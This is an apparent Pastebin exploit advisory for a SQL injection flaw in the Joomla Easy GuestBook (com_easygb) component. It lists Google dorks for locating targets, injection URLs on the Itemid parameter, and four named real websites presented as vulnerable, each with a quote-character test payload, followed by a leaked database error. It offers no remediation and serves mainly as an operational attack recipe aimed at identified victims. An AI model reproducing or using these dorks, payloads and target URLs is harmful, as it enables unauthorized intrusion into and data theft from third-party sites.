Advertisement
KingSkrupellos

Joomla 1.0.15 Easy GuestBook Com_EasyGB 1.0 SQL Injection

Aug 28th, 2019
151
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.20 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : Joomla 1.0.15 Easy GuestBook Com_EasyGB Components 1.0 SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 29/08/2019
  7. # Vendor Homepage : joomlacode.org/gf/project/easygb/ - joomlart.com
  8. # Joomla Affected Version : Joomla 1.0.12 - Joomla 1.0.15
  9. # Software Affected Version : 1.0 - 1.x
  10. # Tested On : Windows and Linux
  11. # Category : WebApps
  12. # Exploit Risk : Medium
  13. # Google Dorks : inurl:/index.php?option=com_easygb
  14. intext:2007 NoComply Skateshop
  15. intext:Copyright © 2005 - 2019 Art-Of-Pictures.de. Designed by JoomlArt.com
  16. intext:Tv-Kreuztal Badminton
  17. intext:Türkisch Islamischer Kultur- & Sportverein DITIB Mimar Sinan Moschee Sachsenheim e. V.
  18. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  19. Special Elements used in an SQL Command ('SQL Injection') ]
  20. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  21. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  22. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  23.  
  24. ###################################################################
  25.  
  26. # Impact :
  27. ***********
  28. Joomla 1.0.15 Easy GuestBook Com_EasyGB Components 1.0 is prone to an SQL-injection
  29. vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  30. Exploiting this issue could allow an attacker to compromise the application, access or
  31. modify data, or exploit latent vulnerabilities in the underlying database.
  32. A remote attacker can send a specially crafted request to the vulnerable application and
  33. execute arbitrary SQL commands in application`s database. Further exploitation of this
  34. vulnerability may result in unauthorized data manipulation.
  35. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  36.  
  37. ###################################################################
  38.  
  39. # SQL Injection Exploit :
  40. **********************
  41. /index.php?option=com_easygb&task=new&Itemid=[SQL Injection]
  42.  
  43. /index.php?option=com_easygb&task=new&Itemid=[SQL Injection]&lang=english
  44.  
  45. ###################################################################
  46.  
  47. # Example Vulnerable Sites :
  48. *************************
  49. [+] ditib-sachsenheim.de/index.php?option=com_easygb&task=new&Itemid=1%27&lang=english
  50.  
  51. [+] badminton-kreuztal.de/index.php?option=com_easygb&task=new&Itemid=1%27&lang=english
  52.  
  53. [+] nocomply.it/index.php?option=com_easygb&task=new&Itemid=1%27&lang=english
  54.  
  55. [+] art-of-pictures.de/index.php?option=com_easygb&task=new&Itemid=1%27&lang=english
  56.  
  57. ###################################################################
  58.  
  59. # Example SQL Database Error :
  60. ****************************
  61. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version
  62. for the right syntax to use near \'generated < DATE_SUB(NOW(), INTERVAL 2 HOUR)\' at line 1
  63. SQL=DELETE FROM jos_easygb_captcha WHERE generated < DATE_SUB(NOW(), INTERVAL 2 HOUR)
  64.  
  65. ###################################################################
  66.  
  67. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  68.  
  69. ###################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement